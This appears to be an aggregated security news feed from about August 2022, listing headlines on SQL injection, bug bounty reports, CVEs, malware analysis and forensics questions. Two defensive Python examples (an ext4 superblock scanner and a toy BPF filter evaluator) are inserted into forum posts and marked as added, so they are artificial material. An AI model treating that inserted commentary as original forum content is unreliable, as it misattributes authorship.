    Covers the 30+ common unauthorized access vulnerabilities currently published in online reports.
  • Open

    game images
    submitted by /u/PM_ME_TO_PLAY_A_GAME
  • Open

    The Mythical Container net.core.somaxconn (2022)
    TL; DR Try to answer several quick questions with a long post: On creating a pod in Kubernetes, if somaxconn is not specified, what the default value will be, and who will set it? If changing node’s sysctl settings, will they be propagated to pods? Are all sysctl parameters are equal in terms of initialization and propagation? TL; DR 1 Background 1.1 Journey of components when creating a pod 1.2 sysctls in container and unsafe sysctls in k8s 1.3 The net.core.somaxconn parameter of pods/containers 1.4 Problem statement 2 Dig inside 2.1 kube-apiserver -> kubelet 2.2 kubelet -> dockerd 2.3 Skip k8s/kubelet/cni: create container right from docker 2.4 Skip docker: create container right from containerd Find the right containerd.sock file Pull image Create a container Check the …

  • Open

    Process Injection
    Whenever we get a reverse shell, it's mostly spawned by creating a new separate process; if that process gets killed, it could be… Continue reading on Medium »
  • Open

    Automate SQLiDetector Hacking Tool
    A completely automated SQL injection detector hacking tool
    Hacking a company from a phone
    This story is a tale from my job about being able to fully compromise a server while only having my phone available to me.
    Irremovable guest in Facebook event — Facebook bug bounty
    Hello everyone, this is Rajiv Gyawali from Butwal, Nepal. This is the story of one of my findings on Facebook.
    Orderby Limit Sql
    Introduction to SQL LIMIT and ORDER BY: the LIMIT clause in MySQL is used to restrict the number of rows retrieved in the result set of the…
    Web Security Academy — OS command injection, simple case
    This challenge is from the Web Security Academy by PortSwigger. It is under the category "OS command injection". After starting the lab…
    Bypassing Blacklists CTF In Kali Linux
    No content preview
    Automated Tools Sql NINJA
    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking…
    Error Based Sql Injection
    What is error-based SQL injection?
    Double Blind Sql Injection
    SQL injection vulnerabilities are often detected by analyzing error messages received from the database, but sometimes we cannot exploit…
    How Blind SQL Injection Works
    Blind SQL injection is a type of SQL injection attack where the attacker indirectly discovers information by analyzing server reactions to…
  • Open

    Fix : (Security) Mitigate Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1635321 - Bounty: $200
  • Open

    Chrome 105 Beta: Custom Highlighting, Fetch Upload Streaming, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 105 is beta as of DATE. You can download the latest on Google.com for desktop or on Google Play Store on Android. Custom Highlight API The Custom Highlight API extends the concept of highlighting pseudo-elements by providing a way to style the text of arbitrary ranges, rather than being limited to the user agent-defined ::selection, ::inactive-selection, ::spelling-error, and ::grammar-error. This is useful in a variety of scenarios, including editing frameworks that wish to implement their own selection, find-in-page over virtuali…
  • Open

    How Passwordless Works
    Passwordless is a form of authentication that doesn't require users to provide passwords during login. That much you could glimpse from the name, but how does it work? What are its trade-offs? This blog post will do its best to explain to you how passwordless can be implemented using modern technologies such as Web Authentication (WebAuthn), while at the same time providing better user experience and security than the traditional password-based approach. submitted by /u/Blakebvhjjdd
    Repository of Adversarial Tactics That is Updated Daily
    submitted by /u/entropydaemon8
    New Era of Phishing Payloads After The Deprecation of Macros
    submitted by /u/sciencestudent99
    Reverse Engineering Windows Printer Drivers (Part 1)
    submitted by /u/sanitybit
    Exploiting a Linux kernel Use-After-Free in io_uring
    submitted by /u/awarau888
    A journey into IoT - Unknown Chinese alarm - Part 3 - Radio communications
    submitted by /u/0xdea
    Abusing container mount points and symlinks on MikroTik's RouterOS to gain code execution
    submitted by /u/crower
    fwd:cloudsec 2022 Conference Talk Recordings
    submitted by /u/sanitybit
  • Open

    Why do you do Exploit Dev?
    Before I start this I want to preface that I am genuinely curious and not trying to start an argument over programming languages and whatnot, but why do you all want to do exploit development? As far as I understand it (which is possibly incorrect), developing exploits is starting to become a thing of the past, with much "safer" languages and mitigations being implemented and software becoming much safer. Now this may be a scathing hot take, but is there a bit of truth to it? I like the idea of Exploit Dev and I would love to know your opinions/why you do what you do. I want to get into Exploit Dev, but I don't think as a career, rather as a cool hobby that would be cool to talk about. Thanks for reading. submitted by /u/Synosis1
  • Open

    CVE-2022-29582 – An io_uring vulnerability
    Article URL: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/ Comments URL: https://news.ycombinator.com/item?id=32359814
    CVE-2022-29154 – rsync exploit
    Article URL: https://docs.ssh-mitm.at/CVE-2022-29154.html Comments URL: https://news.ycombinator.com/item?id=32353570
  • Open

    High-impact vulnerability in DrayTek routers leaves thousands of SMEs open to
    Article URL: https://portswigger.net/daily-swig/high-impact-vulnerability-in-draytek-routers-leaves-thousands-of-smes-open-to-exploitation Comments URL: https://news.ycombinator.com/item?id=32356636
    Slack Serious Vulnerability: Invite Link Function
    Just received this in my inbox: We are writing to let you know about a bug we recently discovered and fixed in Slack's Shared Invite Link functionality. This feature allows you to create a link that will permit anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because you created and/or revoked one of these links for your workspace between April 17, 2017 and July 17, 2022. We'll go into detail about this security issue below. Important things first, though: We have no reason to believe that anyone was able to obtain your plaintext password because of this vulnerability. However, for the sake of caution, we have reset your Slack password. You will need to set a new Slack password before…
  • Open

    War in Ukraine / August 4
    Day 163: The Kharkiv direction is another difficult point for the Russian Federation
    An Interview with a Private Investigator and OSINT master
    Chatting with OhShINT
  • Open

    SecWiki News 2022-08-05 Review
    Some scattered thoughts from the fourth year of attack-defense drills by ourren; The full process of multi-layer intranet penetration with MSF by ourren; Data transmission security white paper by ourren; Development and adjustment of the US critical infrastructure cyber defense roadmap by ourren. For more recent articles, visit SecWiki.
  • Open

    How do you analyze a possible "drive by" download incident?
    Or is it something else entirely? [Paraphrasing here] I received a panicked call from a friend the other day. Intending to go to fivethirtyeight.com, she'd instead typed in .org. This took her to a page (safety-search dot com) that was prompting her to download their "yahoo team developed" browser plugin to help her with safe searches. She didn't click on anything and, when she got back to her screen with phone in hand, her browser had gone to fivethirtyeight.com. There were no malware protection software notifications of any kind anywhere in the process. Did something already happen by then, even if she didn't click on anything? What's the best way to look at this type of incident to figure out what might or might not have happened? submitted by /u/arnach
  • Open

    How to analyze Linux malware – A case study of Symbiote
    https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/ submitted by /u/CyberMasterV
    Linux Forensics Scenario
    Good morning /r/computerforensics I've got a hypothetical scenario I'd like to run by you - I've got a Ubuntu VM. Suppose I create a partition, write files to that partition, and then delete the partition. How would I image the VM to obtain the disk slack that contained that partition? Do VMs even contain disk slack? How about if I have partition sda, sdb, and sdc, aside from the naming convention, if I deleted sdb, any tips on identifying that there was once sdb (using a tool like sleuthkit)? Thank you for your time and mental cycles :) submitted by /u/DeadBirdRugby
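    As an added example that is not part of the post above, the Python below does the simplest version of the second thing asked: it scans a raw disk image sector by sector for the signature of an ext4 filesystem whose partition-table entry has been deleted. An ext4 primary superblock sits 1024 bytes into its partition and carries the magic 0xEF53 (little-endian) at superblock offset 0x38, so an image offset `start` is a candidate former partition whenever `start + 0x438` holds that magic and the blocks count next to it is non-zero. The image here is constructed in memory with one such orphaned superblock; on a real case you would read the raw image (`qemu-img convert -O raw` output for a VM disk, or a `dd` image) in its place. The volume label, the block count and the sector at which the fake partition starts are assumptions.

```python
import struct

EXT4_MAGIC = 0xEF53   # s_magic, little-endian, at offset 0x38 of the superblock
SB_OFFSET = 1024      # the primary superblock lives 1024 bytes into its partition
SECTOR = 512


def make_fake_ext4_superblock(volume_name: bytes, blocks_count: int) -> bytes:
    """Constructed test data: a 1024-byte ext4 superblock with only the fields
    the scanner reads filled in (s_blocks_count_lo at 0x04, s_magic at 0x38,
    s_volume_name at 0x78). It is not a mountable filesystem."""
    sb = bytearray(1024)
    struct.pack_into("<I", sb, 0x04, blocks_count)
    struct.pack_into("<H", sb, 0x38, EXT4_MAGIC)
    sb[0x78:0x78 + 16] = volume_name.ljust(16, b"\0")[:16]
    return bytes(sb)


def build_test_image() -> bytes:
    """Constructed disk image: 4 MiB of zeros holding one ext4 superblock whose
    partition started at sector 2048 (1 MiB). The partition-table entry is gone
    (all zeros), but the filesystem metadata is still on disk."""
    img = bytearray(4 * 1024 * 1024)
    part_start = 2048 * SECTOR          # assumed start sector of the deleted partition
    sb = make_fake_ext4_superblock(b"deleted_sdb1", 0x1000)
    img[part_start + SB_OFFSET:part_start + SB_OFFSET + len(sb)] = sb
    return bytes(img)


def scan_for_ext4_superblocks(image: bytes, step: int = SECTOR):
    """Walk the image at sector granularity, ignoring the partition table, and
    return every offset that looks like the start of an ext4 partition:
    magic 0xEF53 at start+0x438 with a non-zero blocks count.
    Returns a list of (partition_start, volume_name, blocks_count)."""
    hits = []
    for start in range(0, len(image) - SB_OFFSET - 1024, step):
        sb_off = start + SB_OFFSET
        magic = struct.unpack_from("<H", image, sb_off + 0x38)[0]
        if magic != EXT4_MAGIC:
            continue
        blocks = struct.unpack_from("<I", image, sb_off + 0x04)[0]
        if blocks == 0:
            continue  # a stray 0xEF53 with an empty superblock around it is noise
        raw_name = image[sb_off + 0x78:sb_off + 0x78 + 16]
        name = raw_name.split(b"\0", 1)[0].decode("latin-1")
        hits.append((start, name, blocks))
    return hits


if __name__ == "__main__":
    for start, name, blocks in scan_for_ext4_superblocks(build_test_image()):
        print(f"ext4 superblock: partition started at byte {start} "
              f"(sector {start // SECTOR}), label={name!r}, blocks={blocks}")
```

    The Sleuth Kit's `sigfind` does this kind of signature search on a real image (and `mmls` will no longer list the partition once its table entry is zeroed), and a hit's blocks count and block size tell you how far the region extends for carving. In the question sda/sdb/sdc are whole disks rather than partitions, but the scan is the same either way, since it never consults the partition table.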
    Remote Forensic Imaging
    Hello everyone! I have to create a forensic image of a dedicated server hosted on OVH. Any suggestions? submitted by /u/Zipper_Ita
  • Open

    Analysis of APT32 attack activity against critical-infrastructure organizations in China
    APT32 (OceanLotus) is a top-tier, state-backed hacking group.
    FreeBuf Morning Report | Alibaba says internet companies are slowing cloud spending; Woody remote-access trojan targets Russian entities
    On Alibaba's Q2 2022 earnings call, executives spoke of a "slowdown in the internet industry" that is holding back Alibaba Cloud's growth.
    Beware of ransomware damage to industrial control networks
    Ransomware is a type of malware that spreads mainly via email, trojanized programs and drive-by downloads from compromised web pages. It is malicious and extremely damaging; once infected, a victim suffers losses that are hard to estimate.
    Key points of Cambodia's data-compliance rules
    In recent years Cambodia has placed great emphasis on developing its digital economy, enacting an E-Commerce Law and bringing foreign e-commerce companies into a simplified VAT registration scheme.
    New Linux botnet RapperBot brute-forces SSH servers
    Researchers have discovered a new IoT botnet, "RapperBot", that has been active since mid-June 2022.
    FreeBuf Weekly | Australian privacy regulator investigates TikTok; India withdraws data protection bill; blockchain industry hit hard by supply-chain attack
    Australia's privacy regulator is investigating TikTok; TikTok says the report contains multiple errors and reflects "a fundamental misunderstanding of mobile apps".
    [Deep dive] Source analysis of OpenSea's new Seaport protocol
    NFT marketplace OpenSea recently announced Seaport, a new Web3 marketplace protocol for buying and selling NFTs securely and efficiently. This article analyzes its key business logic and interface implementation in depth.
    Notes from a penetration test of an illegal website
    The original of this article is on my personal WeChat official account (ZAC安全); some controversial content has been revised.
    Indian government announces withdrawal of its data protection bill
    On August 3, India's Minister of State for Electronics and Information Technology Rajeev Chandrasekhar announced that the Data Protection Bill introduced in 2019 has been formally withdrawn.
    Cyberattacks on the gaming industry surged 167% in the past year
    Cybersecurity company Akamai has released its latest report.
    DrayTek RCE vulnerability affects 29 router models
    Researchers have found a critical remote code execution vulnerability that seriously affects 29 models of DrayTek Vigor business routers.
    German Chamber of Commerce and Industry knocked out by cyberattack
    An attack group targeted the DIHK with a large-scale cyberattack; unable to withstand an attack of that strength, DIHK simply gave up and shut down.
    $5 million stolen from Solana; exact cause still unclear
    Attackers stole more than $5 million from the Solana blockchain platform; the exact cause of the theft is still under investigation.
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview

  • Open

    Elastic Open Sources Their Endpoint Security Protection YARA Ruleset
    submitted by /u/sanitybit
    Azure Threat Research Matrix
    submitted by /u/sanitybit
    HyperDbg: Reinventing Hardware-Assisted Debugging
    submitted by /u/sanitybit
    Sharpening Your Tools: Updating bulk_extractor for the 2020s
    submitted by /u/sanitybit
    Cloudflare Implements Experimental Support for Post-Quantum Cryptography
    submitted by /u/sanitybit
    Exploring the SameSite cookie attribute for preventing CSRF!
    submitted by /u/macropng
    How To Implement JSON Web Token (JWT) in Java Spring Boot
    submitted by /u/sanitybit
    Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more!
    submitted by /u/ly4k_
    QNAP Poisoned XML Command Injection (Silently Patched)
    submitted by /u/chicksdigthelongrun
    Tool that automates the tedious process of searching leaks through format string vulnerabilities. It will allow you to find stack leaks, pie leaks and canary leaks, in each case indicating the payload that provides the leak.
    submitted by /u/Diego-AltF4
    Building did someone clone me: a free service that notifies its users when their website is cloned and used in a phishing attack
    submitted by /u/wez32
    Risky Business: Determining Malicious Probabilities Through ASNs
    submitted by /u/sanitybit
    PersistenceSniper: Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines by @last0x00
    submitted by /u/last0x00
    Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers
    submitted by /u/Gallus
  • Open

    Server Side Template Injection-Something Distinct!
    How's it going guys! My name is Sagar Sajeev and this is my writeup about one of my recent SSTI (Server Side Template Injection) findings.
    Finding internal ip for big organization
    I have found a way to find the internal IP of big organizations (for example Twitter, LinkedIn, etc.). The way to do that is very simple.
    The Instacart Bug Bounty Program - How We Work with White Hat Hackers to Secure Instacart
    Authors: James Cha, Vickie Li, Shashank Mirji, and Frank Filho (published on tech-at-instacart)
    Authentication Bypass
    When performing a penetration test of an application, tests against the authentication mechanism are always an important check. While a…
    DBMS Detection Of Sql Injection
    In this article, we will learn about DBMS injection.
    Protection Strategies Sql Injection
    SQL injections are one of the most utilized web attack vectors, used with the goal of retrieving sensitive data from organizations.
    Finding SQL Injection Manually
    SQL injection is a code injection technique used to hack websites, attack data applications and destroy databases by inserting malicious SQL…
    SS7 Practical Video From Pentester Club
    Signaling System 7 (SS7) is an architecture for performing out-of-band signaling in support of call establishment, billing, routing…
    What is footprinting in hacking || types of footprinting || Pentester Club
    Footprinting is an ethical hacking technique used to gather as much data as possible about a specific targeted computer system, an…
  • Open

    “Liberators” vs “Occupiers”: the importance of subtle propaganda
    I defend Lakoff's idea that propaganda is about how one frames an issue by looking at media coverage of the Russian invasion of Ukraine.
    How To Track An Individual On Social Media Using OSINT — Part 3.2
    Hello folks! I hope you liked my OSINT series. In this blog, we will discuss some professional and undercover techniques to track anyone…
    War in Ukraine / August 3
    Day 162: Mykolaiv will not be forcibly evacuated
    Orwell is here now. He's livin' large.
    Well.. let's start this story back at the beginning! I am not a hacker, but Angelina Jolie circa '95 was my first love and I have seen the…
  • Open

    Getting access to mod logs from any public or restricted subreddit via an IDOR vulnerability
    Reddit disclosed a bug submitted by high_ping_ninja: https://hackerone.com/reports/1658418 - Bounty: $5000
    Unauthenticated Private Messages Disclosure via WordPress REST API
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1590237 - Bounty: $350
    Sensei LMS IDOR to send message
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1592596 - Bounty: $100
    Unrestricted File Upload to Blind Stored XSS in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by mrzheev: https://hackerone.com/reports/1577370 - Bounty: $250
  • Open

    Is there any getting around Deep Freeze?
    Has anyone encountered Deep Freeze, and know if there's a way around its "reboot to restore" ability? submitted by /u/greyyit
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Why is there such a big difference in company response time to vulnerabilities?
    I know that each company has different procedures and practices, but as a student of cybersecurity, I'm struggling to understand why some large companies struggle to patch vulnerabilities while others can with ease. To illustrate this example, we'll look at CVE-2022-0778 (publicized March 15th, 2022), an OpenSSL vulnerability that was a bug in the BN_mod_sqrt() function: if served a maliciously crafted cert to parse, it would enter an infinite loop. The vulnerability then impacts a bunch of different scenarios such as denial of service, TLS servers consuming client certs, taking private keys from customers, etc. Looking through the vulnerability reports and responses, I saw that each cybersec company responded to the vulnerability differently. Some were able to patch it fast, while others still haven't come up with a fix. For instance, PAN deployed a patch 39 days after the publication, Check Point deployed one in 2-3 days, but companies like Fortinet and Cisco still haven't announced a patch yet. My main question is: if it's considered "High Severity", then why would some companies still not have it patched? Thanks. submitted by /u/Beginning_Actuary_54
    Missing Firmware Files
    I am attempting to install AlienVault OSSIM on a new server but I cannot get past this error. I cannot find this bin file online. Would anyone be able to link to a place where I can download this firmware file? submitted by /u/SOSicearrow
    Drive-By-Downloads: How does malware "leave" the browser to attack the OS, software, etc?
    How is malware that was delivered to you via the browser able to exploit things like the OS or other software on the computer? In other words, how does malware "travel" outside of the browser to exploit other things on the computer? submitted by /u/Jaruki_Jurakami
  • Open

    SecWiki News 2022-08-04 Review
    No news updates yet today. For more recent articles, visit SecWiki.
  • Open

    HackTheBox — Explosion
    Explosion is a boot2root machine on HackTheBox. It has "Very Easy" difficulty and is part of Tier 0 starting point challenges.
    OXDR-Red Team
    The litmus test of your cybersecurity also helps to achieve a continuous cybersecurity posture. RedOps and CART Vulnerability Management…
  • Open

    A deep dive into Java deserialization: how JNDI lookups actually run
    An in-depth study of the principles of JNDI injection and the logic behind it.
    Blockchain industry hit by supply-chain attack; tens of thousands of crypto wallets drained of over $100 million
    According to tech outlet TechCrunch, several unknown attackers drained tens of thousands of crypto wallets holding tokens worth over a hundred million dollars.
    FreeBuf Morning Report | Australian privacy regulator investigates TikTok; GitLab plans to delete dormant projects in free accounts
    Australia's privacy regulator says it is following its regulatory action policy in examining the TikTok data-privacy issues raised in a report.
    CVE-2022-26138: analysis of the Confluence Server hard-coded credential vulnerability
    Atlassian's July security update covers multiple Confluence Server vulnerabilities; among them, CVE-2022-26138 is a hard-coded credential vulnerability.
    35,000 GitHub repositories hacked? A false alarm: they were only maliciously cloned
    Although "35,000 GitHub repositories attacked" turned out to be a false alarm, a software engineer found that several thousand GitHub repositories were being maliciously cloned.
    Atomic Wallet impersonated: fake website spreads malware
    The well-known decentralized wallet and cryptocurrency exchange portal Atomic Wallet has recently been impersonated.
    Large-scale phishing campaign targets Microsoft enterprise email services
    Security researchers at ThreatLabz have discovered a batch of large-scale phishing campaigns.
    Cisco fixes critical remote code execution vulnerabilities in VPN routers
    Cisco has released software updates to address the two vulnerabilities.
    Microsoft launches new services expanding enterprise access to its threat-intelligence library
    Microsoft launched two new services this week that give enterprise security operations centers (SOCs) broader access to the vast threat intelligence it collects every day.
    R&D recruiting in practice: hiring a 20-person Linux and C team in two months
    At the start of one year, we urgently needed to expand our backend Linux C/C++ development team and had to hire 20 people within two months. How do you ensure quality when the salaries on offer are not top tier?
  • Open

    Comics, underground, European and mainstream
    https://booksdl.org/comics0/ submitted by /u/Forward_Hold5696
  • Open

    Living off Windows Defender | LockBit ransomware sideloads Cobalt Strike through a Microsoft security tool
    Authors: Julio Dantas, James Haughom, Julien Reisdorffer. Translated by: Knownsec 404 Lab translation team. Original link: https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-s...
  • Open

    Need Help. Question about IP/Location
    I am not sure if this is the correct sub; if not, maybe someone can help direct me to the correct one. Basically some of my personal information was stolen and posted online. I used a fake tracking link to capture the IP and other user information of the person that was posting my information online. My main question is, is there any way that the IP could track back to a different state than where the person is actually located? Like if they bought their phone in one state and then moved, could it possibly still show the old state? submitted by /u/HumanUnidentified

  • Open

    geopipe: filter by server location inside your pipe chain
    submitted by /u/lukahacksstuff
    The Consequences of Inadequate Identity Management in your GitHub Organization
    submitted by /u/Hefty_Knowledge_7449
    Hijacking email with Cloudflare Email Routing
    submitted by /u/jwizq
    How to detect Brute Ratel C2 (beacons & server deployments)
    submitted by /u/gid0rah
    EMBA Firmware analyzer version 1.1.0 aka Las Vegas Edt. is out now - a lot of new features including system emulation environment, status bar and Ubuntu support
    submitted by /u/_m-1-k-3_
  • Open

    Programming language(s) question
    Hi all, As you guys know I am going into digital forensics (specifically eDiscovery). My question for the day is, what programming language(s) do you guys suggest that I learn? Thank You. submitted by /u/swatteam23
    TCU Live: 2022AUG01 (latest release)
    The latest version of "TCU Live" (2022AUG01) has been released. It's running the latest Debian sid packages, Linux 5.18 kernel, and third party packages such as the Tor Browser, checkra1n, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0
  • Open

    ISP Stale Record Assignments
    A very large ISP had previously associated a number of their IP addresses to our company. What I mean by this is that a WHOIS/ARIN lookup for the IP has our company name referenced in it. These IP addresses are no longer in use by our company as confirmed by the ISP. The ISP is blaming DNS and telling us that it could take years for our company name to be disassociated with the IP. Why do I care? The IP addresses are negatively impacting our public footprint score utilized by regulatory agencies. Who can disassociate our company name from these IP addresses? Can't the owner of the IPs make this change since they own the IP addresses? What do I need to tell them to do? submitted by /u/mtx4gk
    AlienVault Alarms - Rundll32
    Hi, I need some assistance with AlienVault OTX alarms that I've received recently. Commands are being run on users' machines under their usernames (wouldn't this be "run" as something else if it was an automated process?). They all have to do with C:\Windows\System32\rundll32.exe and C:\Windows\System32\svchost.exe. I will comment and condense the alarms down. The users whose machines it is occurring on are not computer-fluent people and don't know what a command line is. I also can't find any info on the switches of the command line (-k, -s). I'm having trouble figuring out if these are false positives. NOTE: MD5 hashes confirm as Microsoft on VirusTotal. submitted by /u/compguyguy
    Bug bounty programs for Linux Kernel bugs and exploits
    Just curious what are the places willing to pay for Linux Kernel bugs and LPE exploits outside Google's kCTF, ZDI's Pwn2Own, and Zerodium? submitted by /u/AggravatingTell547
    How to exclude specific IP addresses from being monitored on Security Onion?
    Hello, In the global pillar on my manager node (/opt/so/saltstack/local/pillar/global.sls), I already specified my BPF to exclude the monitoring of whitelisted IP addresses as follows:
      nids:
        bpf:
          - not host 192.168.1.2 &&
          - not host 192.168.1.3 &&
          - not host 192.168.1.4
    However, the alerts still triggered from the above IP addresses. I think that the AND operators should be replaced by OR? Any advice would be highly appreciated. Thank you. submitted by /u/sanba06c
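    As an added example that is not part of the post above, the Python below joins a pillar list like the one quoted into a single filter string, keeping the trailing `&&` connectors exactly as written, and evaluates it against a few constructed flows with a small recursive-descent parser for the `host` / `not` / `and` / `or` subset of BPF. It is a toy evaluator, not libpcap, but it shows why the three `not host` terms have to be joined with `and` (a packet survives only if it touches none of the listed hosts) and what the `or` form would let through (every packet, since any flow avoids at least one of the three hosts). The pillar values and the sample flows are constructed for the example.

```python
import ipaddress

# Constructed pillar fragment in the list form quoted above (values are hypothetical).
PILLAR_BPF_LIST = [
    "not host 192.168.1.2 &&",
    "not host 192.168.1.3 &&",
    "not host 192.168.1.4",
]

# Constructed sample flows as (src, dst): three touch an allow-listed host, one does not.
SAMPLE_FLOWS = [
    ("192.168.1.2", "10.0.0.5"),
    ("10.0.0.6", "192.168.1.3"),
    ("192.168.1.4", "192.168.1.2"),
    ("10.0.0.7", "10.0.0.8"),
]


def join_pillar_bpf(items):
    """Concatenate the list items into one filter expression; the trailing '&&'
    on each non-final item is what connects it to the next one."""
    return " ".join(item.strip() for item in items)


def tokenize(expr):
    return expr.replace("(", " ( ").replace(")", " ) ").split()


def parse_bpf(tokens):
    """Parse the BPF subset  host <ip> | not X | X and/&& Y | X or/|| Y | (X)
    with BPF precedence (not > and > or) and return a predicate over
    (src_addr, dst_addr) pairs of ipaddress objects."""
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        return tok

    def primary():
        tok = take()
        if tok == "(":
            p = or_expr()
            if take() != ")":
                raise ValueError("unbalanced parenthesis")
            return p
        if tok == "not":
            p = primary()
            return lambda s, d: not p(s, d)
        if tok == "host":
            addr = ipaddress.ip_address(take())
            return lambda s, d: s == addr or d == addr   # 'host' matches either end
        raise ValueError(f"unexpected token {tok!r}")

    def and_expr():
        left = primary()
        while peek() in ("and", "&&"):
            take()
            right = primary()
            left = (lambda l, r: (lambda s, d: l(s, d) and r(s, d)))(left, right)
        return left

    def or_expr():
        left = and_expr()
        while peek() in ("or", "||"):
            take()
            right = and_expr()
            left = (lambda l, r: (lambda s, d: l(s, d) or r(s, d)))(left, right)
        return left

    pred = or_expr()
    if peek() is not None:
        raise ValueError("trailing tokens in filter")
    return pred


def packets_passing(expr, flows):
    """Return the flows that the filter would capture (i.e. that the NIDS would see)."""
    pred = parse_bpf(tokenize(expr))
    return [f for f in flows
            if pred(ipaddress.ip_address(f[0]), ipaddress.ip_address(f[1]))]


if __name__ == "__main__":
    and_filter = join_pillar_bpf(PILLAR_BPF_LIST)
    print(and_filter, "->", packets_passing(and_filter, SAMPLE_FLOWS))
    or_filter = and_filter.replace("&&", "||")
    print(or_filter, "->", packets_passing(or_filter, SAMPLE_FLOWS))
```

    To check the real thing rather than the toy, `tcpdump -d '<expression>'` prints the BPF program libpcap compiles from the expression, and running `tcpdump -i <iface> '<expression>'` briefly on the sensor shows which packets survive it. If the expression is right but alerts for those hosts keep appearing, the next things to confirm are that the updated pillar was actually applied to the sensor and that the alerts in question come from the NIDS component the `nids: bpf:` key governs rather than from some other source.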
  • Open

    Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware
    We provide a case study of how the criminal group Projector Libra uses legitimate file sharing services to distribute Bumblebee malware. The post Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware appeared first on Unit 42.
  • Open

    War in Ukraine / August 2
    Day 161: HIMARS in action — the Russian Federation failed to destroy any of the systems delivered to Ukraine
  • Open

    [Bugbounty] Blind XSS via header injection to log poisoning
    Hello, I hope you are well and hunting!
    Subdomain Takeover Tool
    dnsReaper — subdomain takeover tool for attackers, bug bounty hunters and the blue team!
    You need these certifications *RIGHT NOW*
    Hello guys, I'm Abhishek, and today I'm here with a new topic. Yes, you heard it right: you need these certifications in 2022 right now. Every…
    Wanna start your Journey in Web3 Cybersecurity or Bug Bounties?
    Here's the list of websites to look at.
    How to get started into Bug Bounty?
    COMPLETE BEGINNER'S GUIDE IN 7 STEPS…
    Elasticsearch: An Easy Win for Bug Bounty Hunters || How To Find and Report
    Assalamu Alaikum, peace be upon you
    5 must-have books for bug hunters (Part 1)
    Hello guys, I'm back with another exciting topic. We all need guidance in bug hunting, through our mentors, professional bug hunters, and…
    When an IDOR becomes EVIL > Total Data Leak
    Hi fellow hackers and friends, this is Aravind here with another article on how an IDOR bug helped me access all user data of a…
    Rate Limiting Bypass
    Hello folks,
    Open Redirect and information gathering before finding that vulnerability
    In this tutorial, I just want to talk about the open redirect vulnerability and explain how hackers do information gathering to find that…
  • Open

    Attacktive Directory
    Active Directory room from TryHackMe (published on System Weakness and Medium)
    HackTheBox — Redeemer
    Redeemer is a boot2root machine on HackTheBox. It has "Very Easy" difficulty and is part of Tier 0 starting point challenges.
    How To Detect Remote Desktop Protocol tunneling over SSH
    During some testing on my Windows VPS, I was checking out the OpenSSH server feature in Windows. This reminded me about the times our Red…
    SOCFortress Attack Simulator
    Using Caldera to test your EDR agent
  • Open

    SecWiki News 2022-08-03 Review
    2022 H1 blockchain security and anti-money-laundering analysis report by ourren; Building an enterprise-grade data governance system from 0 to 1 by ourren; On the necessity and feasibility of an international cyberattack attribution mechanism by ourren; The new phase of cloud computing security: discovering and governing risk in the cloud by ourren; A brief analysis of VMess traffic and the QiangWangBei 2022 "谍影重重" challenge by ourren. For more recent articles, visit SecWiki.
  • Open

    XSS in redditmedia.com can compromise data of reddit.com
    Reddit disclosed a bug submitted by keer0k: https://hackerone.com/reports/862882
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shorteners for fun and profit
    Hello Security Researchers
    Multiple bugs in one program lead to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    FreeBuf Morning Report | German semiconductor manufacturer hit by ransomware; Microsoft announces new external attack surface auditing tool
    German power-electronics manufacturer Semikron disclosed that it was hit by a ransomware attack that went as far as encrypting the company's network.
    How malware disguises itself: this report has the answer
    A key part of malware design and deployment is disguising itself as a legitimate app, tricking users into downloading and running malicious files in order to infect target devices and systems.
    Well-known semiconductor manufacturer Semikron hit by ransomware attack
    German semiconductor manufacturer Semikron disclosed that it suffered a ransomware attack that encrypted part of the company's network.
  • Open

    PART 3: How I Met Your Beacon - Brute Ratel - @MDSecLabs
    submitted by /u/dmchell

    Creating Processes Using System Calls
    submitted by /u/sanitybit
    Using process creation properties to catch evasion techniques
    submitted by /u/sanitybit
    NIST SIKE finalist for quantum safe crypto has been broken by a very efficient classical computer attack.
    submitted by /u/ScottContini
    All your PTY/TTY belongs to us
    submitted by /u/Background-Degree-50

